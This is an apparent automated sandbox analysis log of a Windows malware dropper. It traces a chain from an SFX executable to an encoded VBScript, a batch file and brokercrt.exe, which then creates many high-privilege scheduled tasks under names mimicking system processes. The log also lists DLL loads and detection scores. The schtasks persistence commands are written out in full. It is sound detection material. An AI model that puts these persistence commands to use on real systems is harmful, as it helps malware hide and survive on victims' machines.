            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe; Code function: 0_2_00F49E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
            Source: C:\ReviewHost\brokercrt.exe; File created: C:\Program Files (x86)\google\Update\AFKwztugVSPq.exe
            Source: C:\ReviewHost\brokercrt.exe; File created: C:\Users\user\AFKwztugVSPq.exe
            Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4416:120:WilError_03
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe; Mutant created: NULL
            Source: C:\ReviewHost\brokercrt.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\78906e2ee900157c56aa67d0f651f8aed49b26af
            Source: C:\ReviewHost\brokercrt.exe; File created: C:\Users\user\AppData\Local\Temp\hE0vHax3wk
            Source: C:\Windows\SysWOW64\wscript.exe; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ReviewHost\Qtt5UtOWbMYxPmztsNxVxiRIZauHb.bat" "
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe; Command line argument: sfxname; 0_2_00F4D5D4
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe; Command line argument: sfxstime; 0_2_00F4D5D4
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe; Command line argument: STARTDLG; 0_2_00F4D5D4
            Source: hx1hwVZIjy.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: hx1hwVZIjy.exe; Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: hx1hwVZIjy.exeVirustotal: Detection: 61%
            Source: hx1hwVZIjy.exeReversingLabs: Detection: 73%
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeFile read: C:\Users\user\Desktop\hx1hwVZIjy.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\hx1hwVZIjy.exe "C:\Users\user\Desktop\hx1hwVZIjy.exe"
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ReviewHost\LGlGhCGbVntC7HCLV0QyeYWp.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ReviewHost\Qtt5UtOWbMYxPmztsNxVxiRIZauHb.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ReviewHost\brokercrt.exe "C:\ReviewHost\brokercrt.exe"
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 11 /tr "'C:\Users\user\AFKwztugVSPq.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\user\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 7 /tr "'C:\Users\user\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\ReviewHost\conhost.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\ReviewHost\conhost.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\ReviewHost\conhost.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\google\Update\AFKwztugVSPq.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\google\Update\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 8 /tr "'C:\Users\Default\WinStore.App.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Users\Default\WinStore.App.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 5 /tr "'C:\Users\Default\WinStore.App.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 10 /tr "'C:\ReviewHost\AFKwztugVSPq.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\ReviewHost\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 6 /tr "'C:\ReviewHost\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Windows\Containers\serviced\wininit.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\Containers\serviced\wininit.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Windows\Containers\serviced\wininit.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 10 /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 11 /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Recovery\smss.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\smss.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Recovery\smss.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\Recent\AFKwztugVSPq.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\Default User\Recent\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\Recent\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Videos\AFKwztugVSPq.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\Public\Videos\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe "C:\Users\Default User\Recent\AFKwztugVSPq.exe"
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Videos\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Users\Public\Videos\AFKwztugVSPq.exe C:\Users\Public\Videos\AFKwztugVSPq.exe
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "cscriptc" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "cscript" /sc ONLOGON /tr "'C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "cscriptc" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ReviewHost\LGlGhCGbVntC7HCLV0QyeYWp.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ReviewHost\Qtt5UtOWbMYxPmztsNxVxiRIZauHb.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ReviewHost\brokercrt.exe "C:\ReviewHost\brokercrt.exe"Jump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: api-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: api-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: api-ms-win-core-localization-l1-2-1.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: version.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: wldp.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: profapi.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: amsi.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: userenv.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: propsys.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: edputil.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: netutils.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: slc.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: sppc.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\ReviewHost\brokercrt.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe Section loaded: mscoree.dll
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe Section loaded: apphelp.dll
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe Section loaded: version.dll
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe Section loaded: uxtheme.dll
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe Section loaded: windows.storage.dll
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe Section loaded: wldp.dll
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe Section loaded: profapi.dll
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe Section loaded: cryptsp.dll
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe Section loaded: rsaenh.dll
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe Section loaded: cryptbase.dll
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe Section loaded: mscoree.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe Section loaded: apphelp.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe Section loaded: version.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe Section loaded: uxtheme.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe Section loaded: windows.storage.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe Section loaded: wldp.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe Section loaded: profapi.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe Section loaded: cryptsp.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe Section loaded: rsaenh.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe Section loaded: cryptbase.dll
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: hx1hwVZIjy.exe Static file information: File size 1165442 > 1048576
            Source: hx1hwVZIjy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: hx1hwVZIjy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: hx1hwVZIjy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: hx1hwVZIjy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: hx1hwVZIjy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: hx1hwVZIjy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
